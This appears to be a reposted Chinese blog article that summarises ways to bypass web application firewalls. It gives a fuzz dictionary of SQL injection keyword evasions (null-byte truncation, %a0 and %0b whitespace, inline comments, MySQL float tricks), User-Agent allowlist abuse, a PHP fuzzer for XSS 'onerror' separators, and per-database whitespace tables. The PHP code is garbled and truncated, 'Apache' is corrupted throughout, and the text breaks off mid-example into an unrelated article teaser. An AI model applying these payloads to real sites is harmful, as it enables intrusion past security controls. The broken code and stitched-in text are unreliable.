WAF绕过的一些总结和思考,WAF怎么防绕过。


WAF分类:

1.网络层类
2.最常见且容易部署的应用层类 (部署在APAC++HE之前,APAC++HE之后)

应用层WAF – 利用WAF自身缺陷和MYSQL语法特性并结合实际绕过:
WAF最常见检测方式:关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求,丢弃这个数据包,XSS代码同理。

常见的绕过类型:

类型1:
数据包 -> WAF(利用string存储请求参数,解码后检测)-> APAC++HE
C++语言等利用string等储存结构存储请求,在解码时,%00会成为 NULL 从而截断接下去的请求内容
因此例如 ?id=1%00%20and%201=1 就成为了 ?id=1 从而绕过WAF检测

类型2:
数据包 -> WAF ->APAC++HE

绕过逻辑:
WAF对某些User-Agent特殊放行(如百度spider 的UA)
WAF对某些POST包特殊放行(文件上传包)

类型3免费云主机域名
数据包 -> WAF ->APAC++HE
利用mysql的语法特性和html代码的特殊书写方式、浏览器的渲染方式绕过。由于实际***测试过程中对WAF的实际检测逻辑并不清楚,所以利用fuzz是最好的方法,这也是WAF最常见的绕过方法。

FUZZ字典:
%a0union%a0 (WAF中正则表达式 s 并不能匹配 %a0 但MYSQL视之为 空格)
%0aunion%0a
%0bunion%0b (WAF中正则表达式 s t 并不能识别匹配 %0b)
%09union%09
/**/union/**/
%0dunion%0d
/*%e4*/union/*%e4*/(UTF8中的半个中文 正则表达式中任意匹配符(.)不能匹配该内容)
`version`() (MYSQL语法特性 函数可以书写成 `函数名`())
/*!union*/
8E0union (MYSQL语法特性,检测为浮点数后语境结束,视为空格,下2同)
8.0union
Nunion
.1union/*.1*/

XSS类的一个fuzz实例:

《Fuzz 来检测 onerror 前可以无缝连接怎样的字符》
编写fuzzz.php 和 fuzz.php 代码如下

Fuzzz.php:

$urlhex=[‘0′,’1′,’2′,’3′,’4′,’5′,’6′,’7′,’8′,’9′,’a’,’b’,’c’,’d’,’e’,’f’];
$i=0;
$ii=0;
for ($i=0; $i for ($ii=0; $ii $hex = $urlhex[$i] . $urlhex[$ii];
$realhex = ‘%’ .$urlhex[$i] . $urlhex[$ii];
echo ““;

}
}
?>

Fuzz.php:

$code = $_GET[‘c’];
$cc = $_GET[‘d’];
?>

onerror=”alert(‘‘)”>

运行Fuzzz.php 进行自动fuzz,结果为:

0c,0d,2f,0a,20,09

1506031300c24c8e0557b05eb0.jpg

同理可以fuzz出各种标签的其他位置可以插入的特殊字符。

附SQL语句空白符FUZZ结果:

SQLite3:0A,0D,0C++,09,20
MySQL5:09,0A,0B,0C++,0D,A0,20
PosgresSQL:0A,0D,0C++,09,20
Oracle_11g:00,0A,0D,0C++,09,20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C++,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C++,1D,1E,1F,20

类型4:

数据包 -> WAF ->APAC++HE
这是WAF无法考虑到的…
多次恶意代码检测和处理 留下的隐患:
例子(已修复):
漏洞名称:crm2.qq.com XSS
提交时间:2015-03-30 13:39:31
“这个时候就遇到了你们的迷之waf,

相关推荐: linux没有病毒的原因是什么

本篇内容介绍了“linux没有病毒的原因是什么”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成! linux不是没有病毒,而是病毒少。病毒少的原因:1、Linux账…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 01/31 10:17
下一篇 01/31 10:17